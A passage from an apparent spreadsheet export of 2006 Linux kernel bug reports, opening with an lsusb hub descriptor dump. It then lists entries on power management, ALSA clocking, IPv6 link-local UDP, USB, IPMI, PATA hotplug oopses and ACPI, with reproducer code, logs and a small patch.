Hub bInterfaceSubClass 0 Unused bInterfaceProtocol 0 Full speed hub iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0002 1x 2 bytes bInterval 12 Hub Descriptor: bLength 11 bDescriptorType 41 nNbrPorts 8 wHubCharacteristic 0x000a No power switching (usb 1.0) Per-port overcurrent protection TT think time 8 FS bits bPwrOn2PwrGood 10 * 2 milli seconds bHubContrCurrent 0 milli Ampere DeviceRemovable 0x00 0x0a PortPwrCtrlMask 0x00 0x00 Hub Port Status: Port 1: 0000.0100 power Port 2: 0000.0503 highspeed power enable connect Port 3: 0000.0100 power Port 4: 0000.0100 power Port 5: 0000.0000 Port 6: 0000.0100 power Port 7: 0000.0100 power Port 8: 0000.0100 power Bus 004 Device 001: ID 0000:0000 Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 1.10 bDeviceClass 9 Hub bDeviceSubClass 0 Unused bDeviceProtocol 0 Full speed hub bMaxPacketSize0 64 idVendor 0x0000 idProduct 0x0000 bcdDevice 2.06 iManufacturer 3 Linux 2.6.17-gentoo-r8 uhci_hcd iProduct 2 UHCI Host Controller iSerial 1 0000:00:10.3 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 25 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xe0 Self Powered Remote Wakeup MaxPower 0mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 9 Hub bInterfaceSubClass 0 Unused bInterfaceProtocol 0 Full speed hub iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0002 1x 2 bytes bInterval 255 Hub Descriptor: bLength 9 bDescriptorType 41 nNbrPorts 2 wHubCharacteristic 0x000a No power switching (usb 1.0) Per-port overcurrent protection bPwrOn2PwrGood 1 * 2 milli seconds bHubContrCurrent 0 milli Ampere DeviceRemovable 0x00 PortPwrCtrlMask 0x0a Hub Port Status: Port 1: 0000.0300 lowspeed power Port 2: 0000.0300 lowspeed power Bus 003 Device 002: ID 056a:0062 Wacom Co., Ltd Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 1.10 bDeviceClass 0 (Defined at Interface level) bDeviceSubClass 0 bDeviceProtocol 0 bMaxPacketSize0 8 idVendor 0x056a Wacom Co., Ltd idProduct 0x0062 bcdDevice 2.00 iManufacturer 1 WACOM iProduct 2 CTF-420 V2.0-0 iSerial 0 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 34 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0x80 MaxPower 40mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 3 Human Interface Devices bInterfaceSubClass 1 Boot Interface Subclass bInterfaceProtocol 2 Mouse iInterface 0 HID Device Descriptor: bLength 9 bDescriptorType 33 bcdHID 1.10 bCountryCode 0 Not supported bNumDescriptors 1 bDescriptorType 34 Report wDescriptorLength 110 Report Descriptors: ** UNAVAILABLE ** Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0008 1x 8 bytes bInterval 10 Bus 003 Device 001: ID 0000:0000 Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 1.10 bDeviceClass 9 Hub bDeviceSubClass 0 Unused bDeviceProtocol 0 Full speed hub bMaxPacketSize0 64 idVendor 0x0000 idProduct 0x0000 bcdDevice 2.06 iManufacturer 3 Linux 2.6.17-gentoo-r8 uhci_hcd iProduct 2 UHCI Host Controller iSerial 1 0000:00:10.2 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 25 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xe0 Self Powered Remote Wakeup MaxPower 0mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 9 Hub bInterfaceSubClass 0 Unused bInterfaceProtocol 0 Full speed hub iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0002 1x 2 bytes bInterval 255 Hub Descriptor: bLength 9 bDescriptorType 41 nNbrPorts 2 wHubCharacteristic 0x000a No power switching (usb 1.0) Per-port overcurrent protection bPwrOn2PwrGood 1 * 2 milli seconds bHubContrCurrent 0 milli Ampere DeviceRemovable 0x00 PortPwrCtrlMask 0x0a Hub Port Status: Port 1: 0000.0303 lowspeed power enable connect Port 2: 0000.0300 lowspeed power Bus 002 Device 001: ID 0000:0000 Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 1.10 bDeviceClass 9 Hub bDeviceSubClass 0 Unused bDeviceProtocol 0 Full speed hub bMaxPacketSize0 64 idVendor 0x0000 idProduct 0x0000 bcdDevice 2.06 iManufacturer 3 Linux 2.6.17-gentoo-r8 uhci_hcd iProduct 2 UHCI Host Controller iSerial 1 0000:00:10.1 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 25 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xe0 Self Powered Remote Wakeup MaxPower 0mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 9 Hub bInterfaceSubClass 0 Unused bInterfaceProtocol 0 Full speed hub iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0002 1x 2 bytes bInterval 255 Hub Descriptor: bLength 9 bDescriptorType 41 nNbrPorts 2 wHubCharacteristic 0x000a No power switching (usb 1.0) Per-port overcurrent protection bPwrOn2PwrGood 1 * 2 milli seconds bHubContrCurrent 0 milli Ampere DeviceRemovable 0x00 PortPwrCtrlMask 0x0a Hub Port Status: Port 1: 0000.0300 lowspeed power Port 2: 0000.0100 power Bus 001 Device 001: ID 0000:0000 Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 1.10 bDeviceClass 9 Hub bDeviceSubClass 0 Unused bDeviceProtocol 0 Full speed hub bMaxPacketSize0 64 idVendor 0x0000 idProduct 0x0000 bcdDevice 2.06 iManufacturer 3 Linux 2.6.17-gentoo-r8 uhci_hcd iProduct 2 UHCI Host Controller iSerial 1 0000:00:10.0 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 25 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xe0 Self Powered Remote Wakeup MaxPower 0mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 9 Hub bInterfaceSubClass 0 Unused bInterfaceProtocol 0 Full speed hub iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0002 1x 2 bytes bInterval 255 Hub Descriptor: bLength 9 bDescriptorType 41 nNbrPorts 2 wHubCharacteristic 0x000a No power switching (usb 1.0) Per-port overcurrent protection bPwrOn2PwrGood 1 * 2 milli seconds bHubContrCurrent 0 milli Ampere DeviceRemovable 0x00 PortPwrCtrlMask 0x0a Hub Port Status: Port 1: 0000.0100 power Port 2: 0000.0100 power #</t>
  </si>
  <si>
    <t>powernow-k8: MP systems not supported by PSB BIOS</t>
  </si>
  <si>
    <t>2.6.18-1</t>
  </si>
  <si>
    <t>2006-10-25 06:42 UTC</t>
  </si>
  <si>
    <t>Flavio Pane</t>
  </si>
  <si>
    <t>2007-08-27 13:24 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: N.D (bug is present even with 2.6.17 or 2.6.16) Distribution: Ubuntu 64bit Hardware Environment: X2 3800+, DFI NF4 ULTRA-D, 1GB GSKILL PC4400LA, X800GT Software Environment: Problem Description: I compiled succesfully these two kernels on my pc, but I can't boot, it freezes with a kernel panic. First it shows: powernow-k8 powernow-k8: MP systems not supported by PSB BIOS (only with 2.6.18, not with 2.6.17) Then 20 30 lines which I can't read as they appear in a few seconds (anyway I did a video of these lines at http://napex.altervista.org/kernel.zip ) and they end with a : BAD RIP VALUE Kernel panic: not syncing I haven't issue with a non smp kernel Bios has been upgraded even to latest version (Apr2006). DFI Engenieers say they can't say a word about Linux, that's not their problem. Steps to reproduce: Simply booting this machine (the only change from my single core kernel was to enable SMP, but I also tried with a stock ubuntu kernel and I have the SAME problem)</t>
  </si>
  <si>
    <t>Benoit PAPILLAULT</t>
  </si>
  <si>
    <t>wrong ALSA autodetecting of clocking with 2.6.18</t>
  </si>
  <si>
    <t>2.6.18 / 2.6.18.1 / 2.6.19 / 2.6.20</t>
  </si>
  <si>
    <t>2006-10-27 03:45 UTC</t>
  </si>
  <si>
    <t>Andreas Friedrich</t>
  </si>
  <si>
    <t>2007-04-26 15:50 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.17.13 Distribution: Debian 4.1.1-13 Hardware Environment: - Fujitsu-Siemens Lifebook E6550 - lspci: 00:0d.0 Multimedia audio controller: ESS Technology ES1978 Maestro 2E (rev 10) Subsystem: Fujitsu Limited. Unknown device 1053 Flags: bus master, medium devsel, latency 64, IRQ 9 I/O ports at 1400 [size=256]) Problem Description / Steps to reproduce: I have some problems to get ALSA running on my notbook: If all modules are integrated into kernel, autodetecting of driver es1968 determines a wrong clocking with kernel 2.6.18.1 (got 44640, need 48000). With 2.6.17.13 and older kernels I got the right value! If I compile the es1968 driver as modul for 2.6.18.1 and load it, I also got the right value! So I don't think it is a es1968 problem. I put some printfs in the es1968 driver code: static void __devinit es1968_measure_clock(struct es1968 *chip) { ... spin_lock_irq(&amp;chip-&gt;reg_lock); snd_es1968_bob_inc(chip, ESM_BOB_FREQ); __apu_set_register(chip, apu, 5, pa &amp; 0xffff); snd_es1968_trigger_apu(chip, apu, ESM_APU_16BITLINEAR); do_gettimeofday(&amp;start_time); spin_unlock_irq(&amp;chip-&gt;reg_lock); msleep(50); spin_lock_irq(&amp;chip-&gt;reg_lock); offset = __apu_get_register(chip, apu, 5); do_gettimeofday(&amp;stop_time); snd_es1968_trigger_apu(chip, apu, 0); /* stop */ snd_es1968_bob_dec(chip); chip-&gt;in_measurement = 0; spin_unlock_irq(&amp;chip-&gt;reg_lock); /* check the current position */ printk(KERN_INFO "afrie: offset1=%u measure_count=%u\n", offset, chip- &gt;measure_count); offset -= (pa &amp; 0xffff); offset &amp;= 0xfffe; offset += chip-&gt;measure_count * (CLOCK_MEASURE_BUFSIZE/2); t = stop_time.tv_sec - start_time.tv_sec; printk(KERN_INFO "afrie: offset2=%u delta-t=%u\n", offset, t); t *= 1000000; if (stop_time.tv_usec &lt; start_time.tv_usec) t -= start_time.tv_usec - stop_time.tv_usec; else t += stop_time.tv_usec - start_time.tv_usec; if (t == 0) { snd_printk(KERN_ERR "?? calculation error..\n"); } else { printk(KERN_INFO "afrie: offset3=%u delta-t=%u clock1=%u\n", offset, t, chip-&gt;clock); offset *= 1000; offset = (offset / t) * 1000 + ((offset % t) * 1000) / t; if (offset &lt; 47500 || offset &gt; 48500) { if (offset &gt;= 40000 &amp;&amp; offset &lt;= 50000) chip-&gt;clock = (chip-&gt;clock * offset) / 48000; } printk(KERN_INFO "afrie: offset4=%u clock2=%u\n", offset, chip- &gt;clock); printk(KERN_INFO "es1968: clocking to %d\n", chip-&gt;clock); } ... } and got the following result: es1968.c as MODULE (OK): Oct 26 22:00:50 drache kernel: afrie: offset1=4548 measure_count=0 Oct 26 22:00:50 drache kernel: afrie offset2=2500 delta-t=0 Oct 26 22:00:50 drache kernel: afrie offset3=2500 delta-t=52074 clock1=48000 Oct 26 22:00:50 drache kernel: afrie offset4=48008 clock2=48000 Oct 26 22:00:50 drache kernel: es1968: clocking to 48000 es1968.c into KERNEL (not OK): Oct 25 23:20:24 drache kernel: afrie offset1=4548 measure_count=0 Oct 25 23:20:24 drache kernel: afrie offset2=2500 delta-t=0 Oct 25 23:20:24 drache kernel: afrie offset3=2500 delta-t=56003 clock1=48000 Oct 25 23:20:24 drache kernel: afrie offset4=44640 clock2=44640 Oct 25 23:20:24 drache kernel: es1968: clocking to 44640 I think, if the es1968 is integrated into kernel, I get the wrong tv_usec value after waiting msleep(50). Any ideas?</t>
  </si>
  <si>
    <t>Using Link-local address, IPv6 udp Client and Server running on a same host won't communication</t>
  </si>
  <si>
    <t>2006-10-30 02:02 UTC</t>
  </si>
  <si>
    <t>Weijia Song</t>
  </si>
  <si>
    <t>2008-02-18 04:05 UTC</t>
  </si>
  <si>
    <t>///////////////////////////////////////////////////// Most recent kernel where this bug did not occur: ////////////////////////////////////////////////////////////// Distribution:suse 10.1, redhat 9, redhat AS4, 'uname -a' shows the followings: Linux suse-linux 2.6.18.1-default #1 Mon Oct 30 10:23:04 EST 2006 i686 i686 i386 GNU/Linux /////////////////////////////////////////////////////////////// Hardware Environment: sonic@suse-linux:~&gt; cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 8 model name : Pentium III (Coppermine) stepping : 6 cpu MHz : 864.481 cache size : 256 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pat pse36 mmx fxsr sse bogomips : 1730.50 sonic@suse-linux:~&gt; cat /proc/meminfo MemTotal: 191924 kB ... sonic@suse-linux:~&gt; ifconfig eth0 eth0 Link encap:Ethernet HWaddr 00:50:BA:4F:27:9F inet addr:162.105.130.62 Bcast:162.105.130.255 Mask:255.255.255.0 inet6 addr: fec0::6:250:baff:fe4f:279f/64 Scope:Site inet6 addr: 2001:da8:201:1130:250:baff:fe4f:279f/64 Scope:Global inet6 addr: fe80::250:baff:fe4f:279f/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:10540 errors:0 dropped:0 overruns:0 frame:0 TX packets:1175 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:868189 (847.8 Kb) TX bytes:130119 (127.0 Kb) Interrupt:11 Base address:0xd800 /////////////////////////////////////////////////// Software Environment: sonic@suse-linux:~&gt; gcc -v Using built-in specs. Target: i586-suse-linux Configured with: ../configure --enable-threads=posix --prefix=/usr --with- local-prefix=/usr/local --infodir=/usr/share/info --mandir=/usr/share/man -- libdir=/usr/lib --libexecdir=/usr/lib --enable- languages=c,c++,objc,fortran,java,ada --enable-checking=release --with-gxx- include-dir=/usr/include/c++/4.1.0 --enable-ssp --disable-libssp --enable-java- awt=gtk --enable-gtk-cairo --disable-libjava-multilib --with-slibdir=/lib -- with-system-zlib --enable-shared --enable-__cxa_atexit --enable-libstdcxx- allocator=new --without-system-libunwind --with-cpu=generic --host=i586-suse- linux Thread model: posix gcc version 4.1.0 (SUSE Linux) ///////////////////////////////////////////// Problem Description: As mentioned in the summary, if link-local address and UDP protocol is used, and IPv6 Client and Server run on a same host, they cannot communicating with each other. ////////////////////////////////////// Steps to reproduce: 1) client source code: #include &lt;stdio.h&gt; #include &lt;sys/types.h&gt; #include &lt;sys/socket.h&gt; #include &lt;errno.h&gt; #include &lt;string.h&gt; #include &lt;arpa/inet.h&gt; #define SERVER_PORT (7782) #define BIND_IF "eth0" int main() { printf("This is an IPv6 Client!\n"); //open socket int csk = socket(PF_INET6,SOCK_DGRAM,0); if(csk==-1) { printf("socket() return error:%d\n",errno); printf(strerror(errno)); return -1; } printf("socket()\n"); //create server sockaddr struct sockaddr_in6 saddr; saddr.sin6_family = AF_INET6; saddr.sin6_port = htons(SERVER_PORT); //change the scope id to your interface index saddr.sin6_scope_id = 2; //change the link-local address to yours. inet_pton(AF_INET6,"fe80::250:baff:fe4f:279f",&amp;saddr.sin6_addr); char * msg = "Message from V6CUDP"; int ret = sendto(csk,msg,strlen(msg),0,(struct sockaddr *)&amp;saddr,sizeof (saddr)); if(ret==-1) { printf("send() return error:%d\n",errno); printf(strerror(errno)); return -1; } //close connection close(csk); return 0; } 2) server source code: #include &lt;stdio.h&gt; #include &lt;sys/socket.h&gt; #include &lt;sys/types.h&gt; #include &lt;errno.h&gt; #include &lt;string.h&gt; #include &lt;arpa/inet.h&gt; #define SERVER_PORT (7782) #define BIND_IF "eth0" int main() { printf("This is an IPv6 Server\n"); //create socket int s = socket(PF_INET6,SOCK_DGRAM,0); if(s == -1) { printf("socket return error:%d",errno); printf(strerror(errno)); return -1; } //create sockaddr struct sockaddr_in6 addr; addr.sin6_family = AF_INET6; addr.sin6_port = htons(SERVER_PORT); //change scope id to your interface index addr.sin6_scope_id = 2; //change link-local address to your interface index inet_pton(AF_INET6,"fe80::250:baff:fe4f:279f",&amp;addr.sin6_addr); printf("inet_pton\n"); //bind int ret = bind(s,(struct sockaddr*)&amp;addr,sizeof(addr)); if(ret==-1) { printf("bind() return error:%d\n",errno); printf(strerror(errno)); return -1; } //recvfrom char buf[100]; int len; while((len=recvfrom(s,buf,100,MSG_WAITALL,NULL,NULL))&gt;=0) { buf[len]=0; printf("RECV:%s\n",buf); } close(s); } 3) modify the scope id and link-local address to suite your configuration. 4) gcc -o v6sudp v6sudp.c;gcc -o v6cudp v6cudp.c 5) open a new terminal and issue './v6sudp' 6) open a new terminal and issue './v6cudp' 7) You will find v6cudp can send but v6sudp cannot recv: sonic@suse-linux:~/workspace/ipv6&gt; ./v6sudp This is an IPv6 Server inet_pton sonic@suse-linux:~/workspace/ipv6&gt; ./v6cudp This is an IPv6 Client! socket() sonic@suse-linux:~/workspace/ipv6&gt; 8) If Client and server run on different hosts (NOTE:Change the scope-id and address before you start this expirement), server can get messages from client: sonic@suse-linux:~/workspace/ipv6&gt; ./v6sudp This is an IPv6 Server inet_pton RECV:Message from V6CUDP</t>
  </si>
  <si>
    <t>USB 1 on USB 2 Controller Bug</t>
  </si>
  <si>
    <t>2.6.17, 2.6.18, possibly 2.6.16</t>
  </si>
  <si>
    <t>2006-10-30 08:16 UTC</t>
  </si>
  <si>
    <t>jimbob</t>
  </si>
  <si>
    <t>2007-02-09 07:19 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:2.6.12 possibly later Distribution:Mandriva 2007.0 Hardware Environment:PIII, coppermine Software Environment:Mandriva 2007.0 clean install all updates applied Problem Description:Stand alone USB devices (HP5300C and 5370C) no longer working with most recent kernels. Steps to reproduce:Sane backends installed, Xsane frontend, Avision stand alone USB device, HP5300C scanner. scanimage -l 5mm -t 5mm -x 15mm -y 15mm 2&gt; yourscanner.log the log will contain [avision] attach: [avision] attach: opening libusb:001:003 [avision] attach: open failed (Invalid argument) In the syslog or dmesg you will likely see usb 1-1.3: can't set config #1, error -71 or sane-find-scanner: resmgr: communication failure: No such file or directory (Although sane-find-scanner reports libusb:001:003) If you run scanimage -d yourbackendname -T you will likely get Invalid Argument. Avision developer Rene Rebe has reported this bug several months ago under "new USB 1 on USB 2 controller bug in the linux kernel". Stock 2.6.18.1, Mandriva 2.6.17-5, stock 2.6.16.1 kernels failed. Stock 2.6.12.6 worked in Mandriva 2007.0 clean install all updates applied. Mandriva 2006.0 2.6.12 kernels also work. Bug report #26728 filed with Mandriva.</t>
  </si>
  <si>
    <t>ipmi_si_intf.c sets bad class_mask with PCI_DEVICE_CLASS</t>
  </si>
  <si>
    <t>2.6.17, 2.6.18, 2.6.18.1</t>
  </si>
  <si>
    <t>2006-10-31 08:34 UTC</t>
  </si>
  <si>
    <t>Yvan Seth</t>
  </si>
  <si>
    <t>2008-04-04 01:25 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.16 Distribution: N/A Hardware Environment: Env including PCI card with 0xFFFFFF class. Software Environment: N/A Problem Description: This bug is in the mainline kernel source and was introduced in version 2.6.17. and is present in the 2.6.18.1 kernel.org source release. It looks like device registration in drivers/char/ipmi/ipmi_si_intf.c was cleaned up and a small error was made when setting the class_mask. The fix is simple as the correct mask value is defined in the code but is not used: =========================================================================== --- ipmi_si_intf.c.b0rked 2006-10-31 16:10:15.000000000 +0000 +++ ipmi_si_intf.c 2006-10-31 16:10:48.000000000 +0000 @@ -1845,7 +1845,7 @@ static struct pci_device_id ipmi_pci_devices[] = { { PCI_DEVICE(PCI_HP_VENDOR_ID, PCI_MMC_DEVICE_ID) }, - { PCI_DEVICE_CLASS(PCI_ERMC_CLASSCODE, PCI_ERMC_CLASSCODE) } + { PCI_DEVICE_CLASS(PCI_ERMC_CLASSCODE, PCI_ERMC_CLASSCODE_MASK) } }; MODULE_DEVICE_TABLE(pci, ipmi_pci_devices); ============================================================================== The problem in this code manifests when a hardware device is installed in the system that has a class of 0xFF (misc device, i.e. one that does not fit into any other official class) and has has the other fields also set to 0xFF. With the mask set as it is in the current code the "correct" bits are nicely masked in and a positive match results. The ipmi_si module thinks it is dealing with an unknown device but claims ownership all the same and thus a later loaded correct driver will not get the device as it should. Steps to reproduce: In a system with a PCI card with class 0xFFFFFF load the ipmi_si driver prior to loading the correct driver for the class 0xFFFFFF PCI device. Cheers -Yvan</t>
  </si>
  <si>
    <t>BUG on drive removal with pata_cmd64x</t>
  </si>
  <si>
    <t>2.6.19-rc4-mm1</t>
  </si>
  <si>
    <t>2006-11-01 04:26 UTC</t>
  </si>
  <si>
    <t>Jakub Witkowski</t>
  </si>
  <si>
    <t>2007-06-05 08:19 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: N/A Distribution: Ubuntu Dapper Hardware Environment: IBM Thinkpad T40p + docking station mod. 2877. The controller in question is located in the docking station Software Environment: Ubuntu Dapper (reiserfs on /dev/sda3 + swap on /dev/sda2), kernel is compiled with pata_piix in, no 'old' ide drivers. Problem Description: The docking station I am using has a SiI (CMD) PCI0648 built in; it is used to drive a second CD drive that can be fitted into the dock. As the ultra-slim drives for ThinkPads are quite expensive and quite hard to get, ability to use a more standard drive (and therefore cheaper!) is most welcome. As the previous ide driver for PCI0648 cannot be removed from the kernel in runtime, it makes the laptop impossible to undock without reboot. Current driver works well (I am able to read and burn DVDs at full speed); however it produces following BUG on remove: ata5.00: disabled BUG: unable to handle kernel paging request at virtual address 00200200 printing eip: c02a1d56 *pde = 00000000 Oops: 0002 [#2] Modules linked in: pata_cmd64x nls_utf8 udf rfcomm l2cap bluetooth esp6 ah6 michael_mic khazad wp512 arc4 tea sha512 md4 cast6 cast5 anubis tgr192 xt_limit xt_tcpudp iptable_mangle ipt_LOG ipt_MASQUERADE ip_nat ipt_TOS ipt_REJECT ip_conntrack_irc ip_conntrack_ftp xt_state ip_conntrack nfnetlink iptable_filter ip_tables x_tables capability commoncap ibm_acpi xfrm_user xfrm4_tunnel tunnel4 ipcomp esp4 ah4 pcmcia deflate zlib_deflate zlib_inflate twofish twofish_common camellia serpent blowfish des cbc ecb blkcipher aes xcbc sha1 md5 crypto_null hmac crypto_hash cryptomgr crypto_algapi af_key ext3 jbd mbcache ipv6 snd_intel8x0 snd_ac97_codec snd_ac97_bus snd_pcm_oss snd_mixer_oss snd_pcm snd_timer ipw2100 yenta_socket snd snd_page_alloc ieee80211 ieee80211_crypt rsrc_nonstatic pcmcia_core e1000 sg sr_mod cdrom ehci_hcd uhci_hcd usbcore aic7xxx scsi_transport_spi sd_mod pata_oldpiix CPU: 0 EIP: 0060:[&lt;c02a1d56&gt;] Not tainted VLI EFLAGS: 00010002 (2.6.19-rc4-mm1 #1) EIP is at scsi_device_dev_release_usercontext+0x36/0x100 eax: dffa8c90 ebx: dffa8c08 ecx: 00100100 edx: 00200200 esi: 00000286 edi: dffa8c00 ebp: dffba414 esp: dff25d50 ds: 007b es: 007b ss: 0068 Process kacpi_notify (pid: 42, ti=dff24000 task=dffbd030 task.ti=dff24000) Stack: dffa8e64 c02a1d20 c03baaa0 dffba47c c012b7f2 dffa8cf8 c03bab08 c028d8b2 f88298ae dffa8cf8 c03bab08 c03baaa0 c01f18e9 dffa8d10 c01f1930 f7f50028 f76a9cb0 c01f1f45 dffa8c90 f7f50028 f76a9cb0 c02a137c 00000202 f7f50000 Call Trace: [&lt;c012b7f2&gt;] execute_in_process_context+0x22/0x70 [&lt;c028d8b2&gt;] device_release+0x12/0x70 [&lt;c01f18e9&gt;] kobject_cleanup+0x49/0x90 [&lt;c01f1f45&gt;] kref_put+0x35/0xa0 [&lt;c029ea2f&gt;] scsi_forget_host+0xf/0x50 [&lt;c0298f72&gt;] scsi_remove_host+0x32/0xb0 [&lt;c02a5adc&gt;] ata_host_remove+0x5c/0x110 [&lt;c02a5baa&gt;] ata_pci_remove_one+0x1a/0x40 [&lt;c01fc8b6&gt;] pci_device_remove+0x16/0x40 [&lt;c028fdaf&gt;] __device_release_driver+0x5f/0xc0 [&lt;c02900a2&gt;] device_release_driver+0x22/0x40 [&lt;c028f6bb&gt;] bus_remove_device+0x8b/0xa0 [&lt;c028e146&gt;] device_del+0x146/0x180 [&lt;c028e188&gt;] device_unregister+0x8/0x10 [&lt;c01f9943&gt;] pci_stop_dev+0x23/0x60 [&lt;c01f99ac&gt;] pci_stop_bus_device+0x2c/0x40 [&lt;c0204473&gt;] acpiphp_disable_slot+0x73/0x1a0 [&lt;c020520c&gt;] handle_hotplug_event_func+0xdc/0x1a0 [&lt;c024c836&gt;] hotplug_dock_devices+0x25/0xd1 [&lt;c024cb19&gt;] dock_notify+0xaf/0x139 [&lt;c0236f28&gt;] acpi_ev_notify_dispatch+0x49/0x52 [&lt;c0231ea2&gt;] acpi_os_execute_deferred+0x1c/0x25 [&lt;c52bacc8&gt;] 0xc52bacc8 DWARF2 unwinder stuck at 0xc52bacc8 Leftover inexact backtrace: [&lt;c012b4fa&gt;] run_workqueue+0x5a/0xc0 [&lt;c0231e86&gt;] acpi_os_execute_deferred+0x0/0x25 [&lt;c012b6de&gt;] worker_thread+0xee/0x120 [&lt;c0118e30&gt;] default_wake_function+0x0/0x10 [&lt;c012b5f0&gt;] worker_thread+0x0/0x120 [&lt;c012e5fc&gt;] kthread+0xdc/0xe0 [&lt;c012e520&gt;] kthread+0x0/0xe0 [&lt;c0103acf&gt;] kernel_thread_helper+0x7/0x18 ======================= Code: ff ff 89 1c 24 89 74 24 04 89 6c 24 0c 8b 68 64 8d 55 ec 9c 5e fa ff 82 58 01 00 00 8d 98 78 ff ff ff 8b 53 04 8b 88 78 ff ff ff &lt;89&gt; 0a 89 51 04 b9 00 01 10 00 c7 43 04 00 02 20 00 8d 58 80 8b EIP: [&lt;c02a1d56&gt;] scsi_device_dev_release_usercontext+0x36/0x100 SS:ESP 0068:dff25d50 and driver hangs in a non-functional state (neither removed nor active) HOWEVER, going to /sys/bus/scsi/devices/X:0:0:0/ and echo'ing 1 to delete triggers the same BUG; the drive disappears from the system correctly(!) and pata_cmd64x can be removed from system without further problems. On a subsequent docking, the drive affected by the above bug appears to be confused and kernel complains about not being able to identify the drive, however, after a few attempts it manages to reset the drive. Steps to reproduce:</t>
  </si>
  <si>
    <t>Eric Sandeen</t>
  </si>
  <si>
    <t>ipath driver MCEs system on load when HT chip present</t>
  </si>
  <si>
    <t>2.6.19-rc4</t>
  </si>
  <si>
    <t>2006-11-03 08:51 UTC</t>
  </si>
  <si>
    <t>2006-11-09 07:53 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.18 Hardware Environment: x86_64, QLogic IBA6110 chips Problem Description: The ipath driver causes an MCE after Eric's genirq and HT irq changes in early October. I'm filing this bug to track the issue. We don't seem to have an Infiniband category, so this will have to do.</t>
  </si>
  <si>
    <t>hda_intel: insufficient memory for buffer</t>
  </si>
  <si>
    <t>2006-11-05 08:03 UTC</t>
  </si>
  <si>
    <t>wbrana</t>
  </si>
  <si>
    <t>2007-07-15 04:48 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Hardware Environment: Software Environment: Problem Description: hda_intel driver from ALSA up to 1.0.13 allocates insufficient memory for buffer Steps to reproduce:</t>
  </si>
  <si>
    <t>Duplicate MADT - Sony Vaio VGN-SZ340 Core Duo</t>
  </si>
  <si>
    <t>Kernel 2.6.18.1</t>
  </si>
  <si>
    <t>2006-11-07 05:44 UTC</t>
  </si>
  <si>
    <t>Artur Souza</t>
  </si>
  <si>
    <t>2007-03-23 09:30 UTC</t>
  </si>
  <si>
    <t>*Most recent kernel where this bug did not occur: - *Distribution: Slackware *Hardware Environment: Sony Vaio VGN-SZ340 - Core 2 Duo T7200 (2 GHz), 1 GB RAM, 100 GB HD, wireless ipw3945, 2 video cards (intel and nvidia go 7400) *Software Environment: Slack defaults + KDE *Problem Description: With ACPI enabled in the kernel, `cat /proc/cpuinfo` shows only 1 cpu core. Giving "acpi=off" to the kernel shows the 2 cores. *Steps to reproduce: ACPI enabled and SMP enabled also. Just boot and `cat /proc/cpuinfo`</t>
  </si>
  <si>
    <t>weird battery charge level reported - ACPI Error method parse / execution failed</t>
  </si>
  <si>
    <t>2.6.19-rc1 and above</t>
  </si>
  <si>
    <t>2006-11-07 11:19 UTC</t>
  </si>
  <si>
